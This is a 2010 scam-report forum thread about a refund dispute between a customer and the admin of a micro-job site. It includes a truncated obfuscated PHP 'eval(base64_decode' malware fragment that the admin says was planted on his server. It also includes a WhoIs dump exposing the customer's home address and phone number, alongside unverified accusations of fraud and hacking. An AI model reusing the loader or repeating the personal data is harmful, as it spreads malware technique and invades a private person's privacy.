report scams here at scam.com dont get scammed Scams and Scammers - Expose hypocrisy and spread respect ! Don't get ripped off! REGISTER
Go Back   scams > Scam Message Board > Internet Scams
Register FAQ Register To Post Member List Promote Search Today's Posts Mark Forums Read

Old 05-01-2010, 08:17 PM
Eats Scammers for Breakfast

MyMicroJob - Complete SCAM!

MyMicroJob Admin Michael Roche is a scam artist. I was an employer on that site, and even though I was forced to pay extra to have USA only traffic to my sites.. That is not what I got. Then when I asked for a refund of my money he deleted my account.
I want you to know do not trust this site, because of the way I was treated.
This moron has stolen $100 from me and deleted my account, which had money on it that I PAID. That is theft, and Mr Michael Roche deserves to go to jail for his actions.

Old 05-02-2010, 05:59 AM
Newbie Member

Re: MyMicroJob - Complete SCAM!

I am the ADMIN of MyMicrojob.com Let me first off say this guy is a loser he literary has spent days trying to spam/hack my site and say we are “ a scam” First of all check out our facebook page we have over 3,000 happy users ;) . Second here is what happened user DID not pay for usa traffic as we do not provide traffic we offer microjobs that users complete. He deposited $100.00 into his account April 15th and received a 25% deposit bonus at the time and clearly stated on site any deposit bonuses are NON refundable. After running more than 10 jobs on April 25th the user challenged a “complaint case” via paypal.com the same day they denied his request and this is when it all began. Knowing he was wrong as verified by paypal user began threats against me and this “campaign” to say the site is a scam. He also attacked my website with a virus in turn I have contacted the FBI and his local Livingston police. Only after ALL this was account banned from site. See link below for paypal image and threats this guy has made against our site. Believe me we are not scam if you still have any concern contact us rochem609@gmail.com and I will happily go over any questions anyone may have. Thanks Michael roche MyMicroJob.com Admin

Old 05-02-2010, 06:15 AM
Silver Member

It seems to me that as it often happens here, this is an unhappy costumer without a cause.

I think it is acoates23234 turn to substantiate his claims a little bit more.

Old 05-02-2010, 06:39 AM
Newbie Member

I am aware of this hack as like i said the last user acoats has attacked my site i worked with godaddy.com and thought this one fixed when you go to the site you are still seeing this??

Old 05-02-2010, 06:45 AM
Banned

Quote:
Originally Posted by rochem1867 View Post
I am aware of this hack as like i said the last user acoats has attacked my site i worked with godaddy.com and thought this one fixed when you go to the site you are still seeing this??
I was getting a script which looked like a bogus anti-virus program called, 'Anti-virus 2009'. It also wanted to d/l a file.

It was showing up about 30 minutes ago, got it 4-5 times, but it seems clear at this time.

That's why I deleted the previous post.

Last edited by nomaxim : 05-02-2010 at 06:55 AM.

Old 05-02-2010, 08:21 AM
Most Valued Gold Member

i saw the fake virus scanner, too. only the first time i looked. after that i could see the site. could be it sets a cookie when it runs?

why do people pay you $100? why do you credit 25% to their account, just for their deposit?

if they can't withdraw the $125, then it is still yours and not theirs, eh? when does it become their money?

Last edited by mumbles : 05-02-2010 at 09:09 AM.

Old 05-02-2010, 10:06 AM

Now the dishonest thief has changed the name of his site to MicroMyJob.com..

I do not have anything to hide even though I keep getting harassing emails from this thieving admin, Michael Roche.
Maybe I should post them up in here?

I did not hack his site, he is making that up. Simply because he does not want to give me back my money. I deposited $100, and that is all I want back. As soon as I asked for it.. I get 15 harassing emails and informed that my account has been deleted.

I only want my money back (for not getting ANY of what I paid for) and it is clear that this guy is a complete thief. Do not trust this scammer!

I paid EXTRA for a service and did NOT get what I paid for. Now I have to go through this. Being accused of things that are simply not true.

Do NOT trust this guy at ALL! He is a liar and a thief. At the top of the campaign listing on that site is an option that makes you pay EXTRA for USA only people to come to your site.

I just want my money back. Any honest business person would promptly refund anything paid to them if they could not delilver what was paid for.. unless they were a thief. Then to accuse me of hacking into his site is a blatant lie just to justify his dishonest business practices that may soon land him in jail.

So, go change your name as many times as you want.. it will still not change the fact that you are a liar and a thief, which should be dealt with.

I did not tell you to give me back $125 when I only deposited $100, either.

Last edited by acoates23234 : 05-02-2010 at 10:16 AM. Reason: he says no US only.. that is another lie.

Old 05-02-2010, 10:34 AM
Newbie Member

Again you used the site for over 10 days and as per guidelines deposits that get bonuses are non refundable and as paypal themselves have said i have done nothing wrong THEY decided that not me. http://www.mymicrojob.com/images/123456.jpg

As for the change yes we have had to redirect the site till we can remove this virus that just happened to happen like 4 hours after all this happened between me and you.

Last edited by rochem1867 : 05-02-2010 at 10:38 AM.

Old 05-02-2010, 10:40 AM
Most Valued Gold Member

people pay you $100 to use your site for 10 days? can't say i'll recommend that to my friends.

Old 05-02-2010, 10:41 AM
Newbie Member

Quote:
Originally Posted by mumbles View Post
i saw the fake virus scanner, too. only the first time i looked. after that i could see the site. could be it sets a cookie when it runs?

why do people pay you $100? why do you credit 25% to their account, just for their deposit?

if they can't withdraw the $125, then it is still yours and not theirs, eh? when does it become their money?

User deposit for a "virtual currency" this money is then used to pay other users for the completed jobs etc.. as for the 25% this is just a bonus i offered to encourage users to deposit and create jobs.

Old 05-02-2010, 10:54 AM

Quote:
User deposit for a "virtual currency" this money is then used to pay other users for the completed jobs etc.. as for the 25% this is just a bonus i offered to encourage users to deposit and create jobs.
... then once they deposit and find out that your site does not work like it is supposed to... and ask for their money back.. you accuse them of all kinds of stupid lies.

Let me also remind you (for the second time) Mr Roche, that submitting false statements to government funded entities is a felony.

I do not need to change my name, because I have nothing to hide. Just something to think about.

Old 05-02-2010, 11:10 AM
Newbie Member

Heres a copy of the virus that was installed onto my server only a few hours after i get this email from this guy and after paypal denied his claim.

His email to me:

"
fromAaron Coates

acoates23234@yahoo.com>
tomichael roche
dateSat, May 1, 2010 at 3:22 AM
subjectRe: MyMicroJob
tomichael roche
mailed-byyahoo.com
signed-byyahoo.com

hide details May 1 (1 day ago)

180 days huh?
Well.. your site does not have 180 days left,considering the way you run it.
I know what I have to do now....
Jeez, you should have been a bit more honest about how you do business. We could have made some money together.. but you wanted to get greedy.

Do not say I didn't warn you.

"

Last edited by rochem1867 : 05-02-2010 at 11:13 AM.

Old 05-02-2010, 11:15 AM
Newbie Member

didnt let me put the code up let me try again:

php /**/ eval (base64 _decode

aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZX QoJEdMT0JBTFNbJ
21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGl mKCFmdW5jdGlvb
l9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9 leGlzdHMoJ2dtbCcp
KXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmIC
Etc.. goes on for a while...

Old 05-02-2010, 12:08 PM

Quote:
Heres a copy of the virus that was installed onto my server only a few hours after i get this email from this guy and after paypal denied his claim.

His email to me:

"
fromAaron Coates

acoates23234@yahoo.com>
tomichael roche
tomichael roche
mailed-byyahoo.com
signed-byyahoo.com

hide details May 1 (1 day ago)

180 days huh?
Well.. your site does not have 180 days left,considering the way you run it.
I know what I have to do now....
Jeez, you should have been a bit more honest about how you do business. We could have made some money together.. but you wanted to get greedy.

Do not say I didn't warn you.

"

.. Yes that was me. I can take it a step further, if you want me to. I reported you to your hosting company as well as several consumer protection agencies.

All I want is what I paid for.. as specified by the rules of your site. All I got was scam proofs from your 'workers' who were not even eligible to LOOK at the pages I listed on there (and was FORCED to pay extra for that). You and your workers BOTH have broken the terms of service on your site in that respect... and I'm the bad guy for contributing to your site?

I gave you chance after chance after chance after chance.. Even the spam proofs you turned in on other sites to try to get people to come to your site.. Yes, I did get MANY of those, and can post all of that shit up here..

Why do you not post the REST of those conversations?? Only telling 1/2 of the truth is the same as lying, and sometimes worse.

Posting all that code looking stuff on here looks like a hacking attempt to me, too. You probably put some code on your pages and then said LOOK!! LOOK what HE did to my site! I would not put it past you considering how you run your business. Look.. If you need the money to feed Sherry, Wilson, and Kyle.. That is ok with me (I have a family too).. But you should be honest and say.. I cannot pay you right now as I'm experiencing financial hardships... Instead you say all kinds of bullshit lies and 1/2 truths.

I am an investment broker.. not a hacker.

Please do not insult my intelligence. That will get you in the biggest trouble of all.

Last edited by acoates23234 : 05-02-2010 at 12:20 PM.

Old 05-02-2010, 12:59 PM
Banned

Looks like this guy has all kinda problems.

complaintsboard.com/complaints/account-now-visa-c,
Quote:
50 days ago by fknpist

problems today, their site is DOWN, cannot get ahold of anybody, and they want me to activate my card again that had over $4, 000 on it! Where is my DAM MONEY! I need a lawyer also, contact me acoates23234 @yahoo.com. they mess with the wrong person here...
Looks like he was also going by the username 'Free_Munny' at a few forums last summer.

Got banned over at earnmoneyspace.com/forum about 6 months ago.
Looks like his website got suspended around the end of Oct. last year moneymakergroup.com/Freemunny-Freemunnycom,
Quote:
Originally Posted by mainpro
Posted on Oct 30 2009, 12:31 AM
This Account Has Been Suspended!!!! free_munny is a scam????

Found this to WhoIs for freemunny.com,
Quote:
Registrant:
aaron coates
2911 jeff davis hwy
#62A
Richmond, Virginia 23234
United States

Domain Name: FREEMUNNY.COM
Created on: 06-May-09
Expires on: 06-May-10
Last Updated on: 08-Dec-09

Administrative Contact:
coates, aaron acoates23234 @yahoo.com
2911 jeff davis hwy
#62A
Richmond, Virginia 23234
United States
(804) 562-1472
E-mail addies edited, remove space.

Looks like he started this blog about 2 months ago,
coatesconsulting.wordpress.com/ and coatesconsulting.wordpress.com/about/.
Quote:
Hello world!
February 12, 2010 by coatesconsulting

If you are looking for a no nonsense way to put money in and get back big returns, I have made it SO easy for you. I place ads, and am quite good at it. Look at the about me page for a little bit more about who I am, what I do, and why I do it. I do this 100% legitimate, and file taxes on it and everything, so it is possible that we may need to get a w9 from you.. or a w8 for international investors.

Bottom line, if you want to make 300 – 500% return on your investment in increments of $10, 25, 50 or 100. I can do that for you. But at the same time you should be aware that with any investment, there is some risk involved. I do this with my own money, too… So you can rest assured that that risk is kept to a minimum, while still maintaining a solid ROI (Return On Investment).
Straight to business as usual, I take paypal and greendot money pack as payment options to fund your investment. Feel fre to contact me on yahoo messenger if you want to talk more. My handle on there is acoates23234.
Quote:
Originally Posted by acoates23234
I am an investment broker...
Actually, compared to what we usually see around here you seem to be nothing more then a small time scammer, at least IMO.

Oh, and #62A is a trailer lot number.

Last edited by nomaxim : 05-02-2010 at 01:07 PM.

Old 05-02-2010, 01:41 PM

Think what you want. I did not do anything wrong then, or now.

I only came here to warn people against this guy.. Does that make me a bad person?

Yes Accountnow finally gave my money about 2 weeks later once I had a lawyer contact them on my behalf. I have not had a problem out of them since then. Though the Lawyer got his 30%, greedy bastard, LOL!

Freemunny.com was a failure. Nobody did any of the things I had on there. I did make all of the payouts after closing the site.. All they did was refer themselves 50 times in a row. I can show proof of that, too if you want but, anybody can doctor a picture.. so that will likely not do much good, right? I mean shit everybody is a scammer to you.

The earnmoneyspace thing was complete BS.. I posted in a thread I had going for people to put up payment proofs showing others that I paid them.. and they banned me for 'bumping' my own thread.

So, if you feel I am in the wrong for trying to let others know about this guy and his scheme.. then I will go through other channels..

Oh.. yes 62A was a nice big office for me to work out of when I lived up in Richmond. Having a separate office from your home is a good 'time management' technique for people who work for themselves. You can leave the work.. at work.

Last edited by acoates23234 : 05-02-2010 at 01:48 PM. Reason: 62a lol

Old 05-02-2010, 01:48 PM
Banned

Quote:
Originally Posted by acoates23234 View Post
Yes Accountnow finally gave my money about 2 weeks later once I had a lawyer contact them on my behalf. I have not had a problem out of them since then. Though the Lawyer got his 30%, greedy bastard, LOL!

So, if you feel I am in the wrong for trying to let others know about this guy and his scheme.. then I will go through other channels..
Just keep the phone number for that lawyer handy.

Old 05-02-2010, 03:59 PM
Newbie Member

Makes sence now this "guy" registered under my site as Donna lonnam. I should have seen this right away.

Anyway this is my last post i have offered a refund to him for the $51.11 this is 102.50 he deposited minus what he spent in the site i havnt heard back but im hoping hes ok with this and ends it i am trying to run a bussiness not play games.

As for the future i will be changing the policy for refunds as well as bonuses etc... as i understand his arguement i just dont wish to deal with this anymore.

http://www.mymicrojob.com/images/1.jpg

[quote=nomaxim;920165]Looks like this guy has all kinda problems.

complaintsboard.com/complaints/account-now-visa-c,
Looks like he was also going by the username 'Free_Munny' at a few forums last summer.

Got banned over at earnmoneyspace.com/forum about 6 months ago.
Looks like his website got suspended around the end of Oct. last year moneymakergroup.com/Freemunny-Freemunnycom,

Found this to WhoIs for freemunny.com,E-mail addies edited, remove space.

Looks like he started this blog about 2 months ago,
coatesconsulting.wordpress.com/ and coatesconsulting.wordpress.com/about/.Actually, compared to what we usually see around here you seem to be nothing more then a small time scammer, at least IMO.

Last edited by rochem1867 : 05-02-2010 at 05:06 PM.